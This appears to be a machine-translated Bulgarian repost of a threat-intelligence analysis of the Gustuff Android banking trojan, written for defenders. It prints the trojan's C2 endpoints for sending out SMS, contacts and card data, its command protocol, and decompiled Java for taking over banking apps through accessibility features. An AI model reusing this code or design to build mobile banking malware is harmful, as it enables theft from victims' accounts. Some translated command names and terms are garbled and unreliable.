🥇Как Android Trojan Gustuff обира каймака (фиат и крипто) от вашите акаунти

Точно онзи ден Group-IB Отчетените за активността на мобилния Android троян Gustuff. Той работи изключително на международните пазари, атакувайки клиенти на 100-те най-големи чуждестранни банки, потребители на мобилни 32 крипто портфейли, както и големи ресурси за електронна търговия. Но разработчикът на Gustuff е рускоезичен киберпрестъпник под прякора Bestoffer. Доскоро той хвалеше своя троян като „сериозен продукт за хора с познания и опит“.

Специалист по анализ на зловреден код в Group-IB Иван Писарев в своето изследване той говори подробно за това как работи Gustuff и какви са опасностите от него.

За кого ловува Gustuff?

Gustuff принадлежи към ново поколение зловреден софтуер с напълно автоматизирани функции. Според разработчика троянският кон се е превърнал в нова и подобрена версия на зловреден софтуер AndyBot, който от ноември 2017 г. атакува телефони с Android и краде пари чрез фишинг уеб форми, маскирани като мобилни приложения на известни международни банки и платежни системи. Bestoffer съобщи, че наемната цена на Gustuff Bot е $800 на месец.

Анализът на извадката Gustuff показа, че троянският кон е потенциално насочен към клиенти, използващи мобилни приложения на най-големите банки, като Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, както и крипто портфейли Биткойн портфейл, BitPay, Cryptopay, Coinbase и др.

Първоначално създаден като класически банков троянски кон, в настоящата версия Gustuff значително разшири списъка с потенциални цели за атака. В допълнение към приложенията за Android за банки, финтех компании и крипто услуги, Gustuff е насочен към потребители на пазарни приложения, онлайн магазини, платежни системи и месинджъри. По-специално PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut и други.

Входна точка: изчисление за масова инфекция

Gustuff се характеризира с „класическия“ вектор на проникване в смартфоните с Android чрез SMS съобщения с връзки към APK. Когато устройство с Android е заразено с троянски кон по команда на сървъра, Gustuff може да се разпространи допълнително през базата данни с контакти на заразения телефон или през базата данни на сървъра. Функционалността на Gustuff е предназначена за масово заразяване и максимално капитализиране на бизнеса на своите оператори - има уникална функция за „автоматично попълване“ в законни приложения за мобилно банкиране и крипто портфейли, което ви позволява да ускорите и мащабирате кражбата на пари.

Проучване на троянския кон показа, че функцията за автоматично попълване е внедрена в него чрез услугата за достъпност, услуга за хора с увреждания. Gustuff не е първият троянски кон, който успешно заобикаля защитата срещу взаимодействие с прозоречни елементи на други приложения, използващи тази услуга на Android. Въпреки това използването на услугата за достъпност в комбинация с пълнител за автомобили все още е доста рядко.

След като се изтегли в телефона на жертвата, Gustuff, използвайки услугата за достъпност, може да взаимодейства с елементи на прозореца на други приложения (банкиране, криптовалута, както и приложения за онлайн пазаруване, съобщения и др.), извършвайки действията, необходими за нападателите . Например, по команда на сървъра, троянски кон може да натиска бутони и да променя стойностите на текстовите полета в банковите приложения. Използването на механизма Accessibility Service позволява на троянския кон да заобиколи механизмите за сигурност, използвани от банките за противодействие на мобилни троянски коне от предишно поколение, както и промените в политиката за сигурност, въведена от Google в новите версии на операционната система Android. Така Gustuff „знае как“ да деактивира защитата на Google Protect: според автора тази функция работи в 70% от случаите.

Gustuff може също да показва фалшиви PUSH известия с икони на легитимни мобилни приложения. Потребителят щраква върху PUSH известието и вижда прозорец за фишинг, изтеглен от сървъра, където той въвежда исканите данни за банкова карта или крипто портфейл. В друг сценарий на Gustuff се отваря приложението, от името на което е показано PUSH известието. В този случай злонамереният софтуер, по команда от сървъра чрез услугата за достъпност, може да попълни полетата на формуляра на банково приложение за измамна транзакция.

Функционалността на Gustuff включва също изпращане на информация за заразено устройство към сървъра, възможност за четене/изпращане на SMS съобщения, изпращане на USSD заявки, стартиране на SOCKS5 Proxy, следване на връзка, изпращане на файлове (включително сканирани снимки на документи, екранни снимки, снимки) до сървър, нулирайте устройството до фабричните настройки.

Анализ на зловреден софтуер

Преди да инсталира злонамерено приложение, операционната система Android показва на потребителя прозорец, съдържащ списък с права, поискани от Gustuff:

Приложението ще бъде инсталирано само след получаване на съгласието на потребителя. След като стартира приложението, троянският кон ще покаже на потребителя прозорец:

След което ще премахне иконата си.

Gustuff е опакован, според автора, от опаковчик от FTT. След стартиране приложението периодично се свързва с CnC сървъра, за да получава команди. Няколко файла, които проверихме, използваха IP адрес като контролен сървър 88.99.171[.]105 (по-нататък ще го обозначаваме като <%CnC%>).

След стартиране програмата започва да изпраща съобщения до сървъра http://<%CnC%>/api/v1/get.php.

Отговорът се очаква да бъде JSON в следния формат:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

При всеки достъп до приложението, то изпраща информация за заразеното устройство. Форматът на съобщението е показан по-долу. Заслужава да се отбележи, че полетата пълен, допълнително, приложения и разрешение – незадължителен и ще бъде изпратен само в случай на команда за заявка от CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
}

Съхраняване на конфигурационни данни

Gustuff съхранява оперативно важна информация във файл с предпочитания. Името на файла, както и имената на параметрите в него, са резултат от изчисляване на сумата MD5 от низа 15413090667214.6.1<%име%>Където <%name%> — първоначално име-стойност. Интерпретация на Python на функцията за генериране на имена:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input)

По-нататък ще го обозначаваме като nameGenerator(вход).
Така че първото име на файла е: nameGenerator("API_SERVER_LIST"), съдържа стойности със следните имена:

Име на променливата	Стойност
nameGenerator("API_SERVER_LIST")	Съдържа списък с CnC адреси под формата на масив.
nameGenerator("API_SERVER_URL")	Съдържа CnC адреса.
nameGenerator("SMS_UPLOAD")	Флагът е зададен по подразбиране. Ако флагът е зададен, изпраща SMS съобщения до CnC.
nameGenerator("SMS_ROOT_NUMBER")	Телефонен номер, на който ще се изпращат SMS съобщенията, получени от заразеното устройство. По подразбиране е нула.
nameGenerator("SMS_ROOT_NUMBER_RESEND")	Флагът е изчистен по подразбиране. Ако е инсталиран, когато заразено устройство получи SMS, той ще бъде изпратен до основния номер.
nameGenerator("DEFAULT_APP_SMS")	Флагът е изчистен по подразбиране. Ако този флаг е зададен, приложението ще обработва входящите SMS съобщения.
nameGenerator("DEFAULT_ADMIN")	Флагът е изчистен по подразбиране. Ако флагът е зададен, приложението има администраторски права.
nameGenerator("DEFAULT_ACCESSIBILITY")	Флагът е изчистен по подразбиране. Ако флагът е зададен, се изпълнява услуга, използваща услугата за достъпност.
nameGenerator("APPS_CONFIG")	JSON обект, който съдържа списък с действия, които трябва да бъдат извършени, когато се задейства събитие за достъпност, свързано с конкретно приложение.
nameGenerator("APPS_INSTALLED")	Съхранява списък с приложения, инсталирани на устройството.
nameGenerator("IS_FIST_RUN")	Флагът се нулира при първото стартиране.
nameGenerator("UNIQUE_ID")	Съдържа уникален идентификатор. Генерира се, когато ботът се стартира за първи път.

Модул за обработка на команди от сървъра

Приложението съхранява адресите на CnC сървърите под формата на масив, кодиран от Base85 линии. Списъкът на CnC сървърите може да бъде променен при получаване на съответната команда, като в този случай адресите ще бъдат съхранени във файл с предпочитания.

В отговор на заявката сървърът изпраща команда към приложението. Заслужава да се отбележи, че командите и параметрите са представени във формат JSON. Приложението може да обработва следните команди:

Отбор	описание
напредСтарт	Започнете да изпращате SMS съобщения, получени от заразеното устройство, към CnC сървъра.
напредСпри	Спрете изпращането на SMS съобщения, получени от заразеното устройство до CnC сървъра.
ussdRun	Изпълнете USSD заявка. Номерът, към който трябва да направите USSD заявка, се намира в JSON полето „номер“.
изпрати SMS	Изпратете едно SMS съобщение (ако е необходимо, съобщението се „разделя“ на части). Като параметър командата приема JSON обект, съдържащ полетата “to” - номера на дестинацията и “body” - тялото на съобщението.
изпратиSmsAb	Изпращайте SMS съобщения (ако е необходимо съобщението се „разделя” на части) до всички в списъка с контакти на заразеното устройство. Интервалът между изпращането на съобщения е 10 секунди. Тялото на съобщението е в JSON полето „тяло“
изпратиSmsMass	Изпращайте SMS съобщения (ако е необходимо, съобщението се „разделя“ на части) до контактите, посочени в параметрите на командата. Интервалът между изпращането на съобщения е 10 секунди. Като параметър командата приема JSON масив (полето „sms“), чиито елементи съдържат полетата „до“ - номера на дестинацията и „тялото“ - тялото на съобщението.
changeServer	Тази команда може да приеме стойност с ключа „url“ като параметър – тогава ботът ще промени стойността на nameGenerator(“SERVER_URL”) или “array” – тогава ботът ще запише масива в nameGenerator (“API_SERVER_LIST”) По този начин приложението променя адреса на CnC сървърите.
adminNumber	Командата е проектирана да работи с корен номер. Командата приема JSON обект със следните параметри: „номер“ — промяна на nameGenerator(„ROOT_NUMBER“) на получената стойност, „resend“ — промяна на nameGenerator(„SMS_ROOT_NUMBER_RESEND“), „sendId“ — изпращане до nameGenerator(„ROOT_NUMBER“ ) уникален ИД.
updateInfo	Изпратете информация за заразеното устройство до сървъра.
изтриване на данните	Командата е предназначена за изтриване на потребителски данни. В зависимост от това с какво име е стартирано приложението, или данните се изтриват напълно с рестартиране на устройството (основен потребител), или се изтриват само потребителски данни (вторичен потребител).
чорапиСтарт	Стартирайте прокси модула. Работата на модула е описана в отделен раздел.
чорапиСпри	Спрете прокси модула.
отвори линк	Следвайте връзката. Връзката се намира в параметъра JSON под ключа „url“. „android.intent.action.VIEW“ се използва за отваряне на връзката.
uploadAllSms	Изпратете всички SMS съобщения, получени от устройството, до сървъра.
uploadAllPhotos	Изпращане на изображения от заразено устройство към URL. URL адресът идва като параметър.
качи файл	Изпратете файл на URL от заразено устройство. URL адресът идва като параметър.
uploadPhoneNumbers	Изпратете телефонни номера от вашия списък с контакти към сървъра. Ако като параметър се получи стойност на JSON обект с ключ „ab“, приложението получава списък с контакти от телефонния указател. Ако се получи JSON обект с ключ “sms” като параметър, приложението прочита списъка с контакти от подателите на SMS съобщения.
changeArchive	Приложението изтегля файла от адреса, който идва като параметър, използвайки ключа „url“. Изтегленият файл се запазва с името „archive.zip“. След това приложението ще разархивира файла, като по избор използва паролата за архив „b5jXh37gxgHBrZhQ4j3D“. Разархивираните файлове се записват в директорията [външно хранилище]/hgps. В тази директория приложението съхранява уеб фалшификати (описани по-долу).
мерки	Командата е предназначена да работи с Action Service, която е описана в отделен раздел.
тест	Нищо не правя.
Изтегли	Командата има за цел да изтегли файл от отдалечен сървър и да го запише в директорията „Изтегляния“. URL адресът и името на файла идват като параметър, полета в обекта на параметър JSON, съответно: „url“ и „fileName“.
премахване на	Премахва файл от директорията "Изтегляния". Името на файла идва в JSON параметър с ключа „fileName“. Стандартното име на файла е „tmp.apk“.
нотификация	Показване на известие с текстове на описание и заглавие, определени от сървъра за управление.

Формат на командата нотификация:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

Известието, генерирано от файла, който се разследва, изглежда идентично с известията, генерирани от приложението, посочено в полето ап. Ако стойността на полето openApp — Вярно, когато се отвори известие, се стартира приложението, посочено в полето ап. Ако стойността на полето openApp — Невярно, тогава:

Отваря се прозорец за фишинг, чието съдържание се изтегля от директорията <%външно хранилище%>/hgps/<%filename%>
Отваря се прозорец за фишинг, чието съдържание се изтегля от сървъра <%url%>?id=<%Bot id%>&app=<%Име на приложението%>
Отваря се прозорец за фишинг, маскиран като Google Play Card, с възможност за въвеждане на данни за картата.

Приложението изпраща резултата от всяка команда до <%CnC%>set_state.php като JSON обект в следния формат:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ActionsService
Списъкът с команди, които обработва приложението включва действие. Когато се получи команда, модулът за обработка на команди осъществява достъп до тази услуга, за да изпълни разширената команда. Услугата приема JSON обект като параметър. Услугата може да изпълнява следните команди:

1. PARAMS_ACTION — при получаване на такава команда услугата първо получава от параметъра JSON стойността на ключа Type, която може да бъде както следва:

serviceInfo – подкомандата получава стойността по ключ от JSON параметъра includeNotImportant. Ако флагът е True, приложението задава флага FLAG_ISOLATED_PROCESS към услуга, използваща услугата за достъпност. По този начин услугата ще бъде стартирана в отделен процес.
корен — получавате и изпращате до сървъра информация за прозореца, който в момента е на фокус. Приложението получава информация, използвайки класа AccessibilityNodeInfo.
администратор — поискайте администраторски права.
забавяне — спиране на ActionsService за броя милисекунди, посочени в параметъра за ключа „данни“.
прозорци — изпращане на списък с прозорци, видими за потребителя.
инсталирам — инсталирайте приложението на заразеното устройство. Името на архивния пакет е в ключа „fileName“. Самият архив се намира в директорията Downloads.
в световен мащаб – подкомандата е предназначена за навигация от текущия прозорец:
- в менюто Бързи настройки
- преди
- У дома
- към известия
- към прозореца на наскоро отворените приложения
стартира - стартирайте приложението. Името на приложението идва като параметър по ключ данни.
звуци — променете режима на звука на безшумен.
отключване — включва подсветката на екрана и клавиатурата до пълна яркост. Приложението извършва това действие с помощта на WakeLock, като посочва низа [Етикет на приложението]:INFO като таг
permissionOverlay — функцията не е реализирана (отговорът за изпълнение на команда е {"message":"Not support"} или {"message":"low sdk"})
жест — функцията не е реализирана (отговорът за изпълнение на командата е {"message":"Not support"} или {"message":"Low API"})
разрешения — тази команда е необходима за искане на разрешения за приложението. Функцията за заявка обаче не е реализирана, така че командата е безсмислена. Списъкът с исканите права идва като JSON масив с ключа „permissions“. Стандартен списък:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
отворен — показване на прозорец за фишинг. В зависимост от параметъра, идващ от сървъра, приложението може да покаже следните фишинг прозорци:
- Показване на прозорец за фишинг, чието съдържание е записано във файл в директория <%външна директория%>/hgps/<%param_filename%>. Резултатът от взаимодействието на потребителя с прозореца ще бъде изпратен до <%CnC%>/records.php
- Показване на прозорец за фишинг, чието съдържание е предварително заредено от адреса <%url_param%>?id=<%bot_id%>&app=<%packagename%>. Резултатът от взаимодействието на потребителя с прозореца ще бъде изпратен до <%CnC%>/records.php
- Покажете прозорец за фишинг, маскиран като Google Play Card.
интерактивен — командата е проектирана да взаимодейства с елементи на прозорец на други приложения, използващи AcessibilityService. В програмата е внедрена специална услуга за взаимодействие. Разследваното приложение може да взаимодейства с Windows:
- Активен в момента. В този случай параметърът съдържа id или текст (име) на обекта, с който трябва да взаимодействате.
- Вижда се за потребителя в момента на изпълнение на командата. Приложението избира прозорци по id.
След получаване на обекти AccessibilityNodeInfo За елементите на прозореца, които представляват интерес, приложението, в зависимост от параметрите, може да извърши следните действия:
- фокус — задаване на фокус върху обекта.
- щракване — щракване върху обект.
- actionId — извършване на действие по ID.
- setText — промяна на текста на обект. Промяната на текста е възможна по два начина: извършване на действие ACTION_SET_TEXT (ако версията на Android на заразеното устройство е по-млада или равна на БЛИЗАЛКА), или като поставите низ в клипборда и го поставите в обект (за по-стари версии). Тази команда може да се използва за промяна на данни в банково приложение.

2. PARAMS_ACTIONS - същото като PARAMS_ACTION, пристига само JSON масив от команди.

Изглежда, че много хора ще се интересуват от това как изглежда функцията за взаимодействие с елементи на прозореца на друго приложение. Ето как тази функционалност е реализирана в Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

Функция за заместване на текст:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

По този начин, с правилната конфигурация на контролния сървър, Gustuff може да попълни текстови полета в банковото приложение и да кликне върху бутоните, необходими за извършване на транзакцията. Троянският кон дори не се нуждае от влизане в приложението – достатъчно е да изпрати команда за показване на PUSH известие и след това да отвори предварително инсталираното приложение за банкиране. Потребителят ще се удостовери, след което Gustuff ще може да зареди колата.

Модул за обработка на SMS съобщения

Приложението инсталира манипулатор на събития за заразеното устройство, за да приема SMS съобщения. Проучваното приложение може да получава команди от оператора, които идват в тялото на SMS съобщението. Командите идват във формат:

7!5=<%Base64 кодирана команда%>

Приложението търси низа във всички входящи SMS съобщения 7!5=, когато бъде открит низ, той декодира низа от Base64 при отместване 4 и изпълнява командата. Командите са подобни на тези с CnC. Резултатът от изпълнението се изпраща на същия номер, от който идва командата. Формат на отговора:

7*5=<%Base64 кодиране на „команда за код за резултат“%>

По желание приложението може да изпрати всички получени съобщения до основния номер. За да направите това, коренният номер трябва да бъде посочен във файла с предпочитания и флагът за пренасочване на съобщения трябва да бъде зададен. На номера на нападателя се изпраща SMS съобщение във формат:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Също така, по избор, приложението може да изпраща съобщения до CnC. SMS съобщението се изпраща до сървъра във формат JSON:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

Ако флагът е зададен nameGenerator("DEFAULT_APP_SMS") – приложението спира обработката на SMS съобщението и изчиства списъка с входящи съобщения.

Прокси модул

Проучваното приложение съдържа Backconnect Proxy модул (наричан по-долу Proxy модул), който има отделен клас, който включва статични полета с конфигурация. Конфигурационните данни се съхраняват в извадката в ясна форма:

Всички действия, извършвани от модула Proxy, се записват във файлове. За да направи това, приложението във външно хранилище създава директория, наречена „дневници“ (полето ProxyConfigClass.logsDir в конфигурационния клас), в която се съхраняват регистрационни файлове. Регистрирането се извършва във файлове с имена:

main.txt – работата на класа, наречен CommandServer, се записва в този файл. По-нататък регистрирането на низа str в този файл ще бъде означено като mainLog(str).
сесия-<%id%>.txt — този файл записва регистрационни данни, свързани с конкретна прокси сесия. По-нататък регистрирането на низа str в този файл ще бъде означено като sessionLog (str).
server.txt – този файл се използва за регистриране на всички данни, записани в гореописаните файлове.

Формат на регистрационните данни:

<%Date%> [Тех[<%thread id%>], id[]]: регистрационен низ

Изключенията, които възникват по време на работа на прокси модула, също се записват във файл. За целта приложението генерира JSON обект в следния формат:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

След това го преобразува в низово представяне и го регистрира.

Прокси модулът се стартира след получаване на съответната команда. При получаване на команда за стартиране на прокси модула, приложението стартира извикана услуга MainService, който отговаря за управлението на работата на Прокси модула – стартирането и спирането му.

Етапи на стартиране на услугата:

1. Стартира таймер, който работи веднъж на минута и проверява активността на прокси модула. Ако модулът не е активен, той го стартира.
Също така, когато събитието е задействано android.net.conn.CONNECTIVITY_CHANGE Прокси модулът се стартира.

2. Приложението създава wake-lock с параметъра PARTIAL_WAKE_LOCK и го залавя. Това не позволява на процесора на устройството да премине в режим на заспиване.

3. Стартира класа за обработка на команди на прокси модула, като първо регистрира реда mainLog("стартов сървър") и

Сървър::start() хост[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

където proxy_cnc, command_port и proxy_port – параметри, получени от конфигурацията на прокси сървъра.

Извиква се класът за обработка на команди CommandConnection. Веднага след стартиране извършва следните действия:

4. Свързва се с ProxyConfigClass.host: ProxyConfigClass.commandPort и изпраща данни за заразеното устройство там във формат JSON:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Къде:

id – идентификатор, опитва се да получи стойност с полето „id“ от файла със споделени предпочитания с име „x“. Ако тази стойност не може да бъде получена, тя генерира нова. Така модулът Proxy има свой собствен идентификатор, който се генерира подобно на Bot ID.
imei — IMEI на устройството. Ако възникне грешка по време на процеса на получаване на стойността, вместо това поле ще бъде изписано текстово съобщение за грешка.
imsi — международна идентичност на мобилния абонат на устройството. Ако възникне грешка по време на процеса на получаване на стойността, вместо това поле ще бъде изписано текстово съобщение за грешка.
модел — Видимото от крайния потребител име за крайния продукт.
производителя — Производителят на продукта/хардуера (Build.MANUFACTURER).
androidVersion - низ във формат "<%release_version%> (<%os_version%>),<%sdk_version%>"
държава — текущото местоположение на устройството.
partnerId е празен низ.
packageName – име на пакет.
networkType — тип текуща мрежова връзка (пример: „WIFI“, „MOBILE“). В случай на грешка връща нула.
hasGsmSupport – true – ако телефонът поддържа GSM, в противен случай е false.
simReady – състояние на SIM картата.
simCountry - ISO код на държавата (базиран на доставчика на SIM карта).
networkOperator — име на оператор. Ако възникне грешка по време на процеса на получаване на стойността, вместо това поле ще бъде изписано текстово съобщение за грешка.
simOperator — Името на доставчика на услуги (SPN). Ако възникне грешка по време на процеса на получаване на стойността, вместо това поле ще бъде изписано текстово съобщение за грешка.
версия - това поле се съхранява в класа на конфигурацията; за тестваните версии на бота беше равно на „1.6“.

5. Превключва в режим на изчакване на команди от сървъра. Командите от сървъра идват във формат:

0 отместване – команда
1 отместване – sessionId
2 отместване – дължина
4 отместване - данни

Когато пристигне команда, приложението регистрира:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

Възможни са следните команди от сървъра:

Име	Команда	Дата	Описание
ConnectionId	0	ID на връзката	Създайте нова връзка
SLEEP	3	Време	Поставете на пауза прокси модула
ПИНГ ПОНГ	4	-	Изпратете PONG съобщение

Едно PONG съобщение се състои от 4 байта и изглежда така: 0x04000000.

Когато се получи командаconnectionId (за създаване на нова връзка) CommandConnection създава екземпляр на клас ProxyConnection.

В проксиирането участват два класа: ProxyConnection и край. При създаване на клас ProxyConnection свързване с адреса ProxyConfigClass.host: ProxyConfigClass.proxyPort и предаване на JSON обекта:

 {
    "id":<%connectionId%>
}

В отговор сървърът изпраща SOCKS5 съобщение, което съдържа адреса на отдалечения сървър, с който трябва да се установи връзка. Взаимодействието с този сървър се осъществява чрез класа край. Настройката на връзката може да бъде схематично представена по следния начин:

Мрежови взаимодействия

За да се предотврати анализ на трафика от мрежови снифери, взаимодействието между CnC сървъра и приложението може да бъде защитено с помощта на SSL протокола. Всички предавани данни от и към сървъра се представят във формат JSON. Приложението изпълнява следните заявки по време на работа:

http://<%CnC%>/api/v1/set_state.php — резултатът от изпълнението на командата.
http://<%CnC%>/api/v1/get.php — получаване на команда.
http://<%CnC%>/api/v1/load_sms.php — изтегляне на SMS съобщения от заразено устройство.
http://<%CnC%>/api/v1/load_ab.php — качване на списък с контакти от заразено устройство.
http://<%CnC%>/api/v1/aevents.php – заявката се прави при актуализиране на параметри, намиращи се във файла с предпочитания.
http://<%CnC%>/api/v1/set_card.php — качване на данни, получени с помощта на прозорец за фишинг, маскиран като Google Play Market.
http://<%CnC%>/api/v1/logs.php – качване на регистрационни данни.
http://<%CnC%>/api/v1/records.php – качване на данни, получени чрез фишинг прозорци.
http://<%CnC%>/api/v1/set_error.php – известяване за възникнала грешка.

препоръки

За да защитят своите клиенти от заплахата от мобилни троянски коне, компаниите трябва да използват цялостни решения, които им позволяват да наблюдават и предотвратяват злонамерена дейност, без да инсталират допълнителен софтуер на потребителските устройства.

За целта сигнатурните методи за откриване на мобилни троянски коне трябва да бъдат подсилени с технологии за анализ на поведението както на клиента, така и на самото приложение. Защитата трябва да включва и функция за идентификация на устройството с помощта на технология за цифров пръстов отпечатък, която ще позволи да се разбере кога акаунтът се използва от нетипично устройство и вече е попаднал в ръцете на измамник.

Фундаментално важен момент е наличието на междуканален анализ, който позволява на компаниите да контролират рисковете, възникващи не само в интернет, но и в мобилния канал, например в приложения за мобилно банкиране, за транзакции с криптовалути и всякакви други, където могат да се извършват транзакции.финансова транзакция.

Правила за безопасност за потребителите:

не инсталирайте приложения за мобилно устройство с Android OS от източници, различни от Google Play, обърнете специално внимание на исканите от приложението права;
редовно инсталирайте актуализации на Android OS;
обърнете внимание на разширенията на изтеглените файлове;
не посещавайте подозрителни ресурси;
Не кликвайте върху връзки, получени в SMS съобщения.

В ролите Семьон Рогачева, младши специалист по изследване на зловреден софтуер в Лабораторията за компютърна криминалистика на Group-IB.

Източник: www.habr.com

Как Android Trojan Gustuff обира каймака (фиат и крипто) от вашите акаунти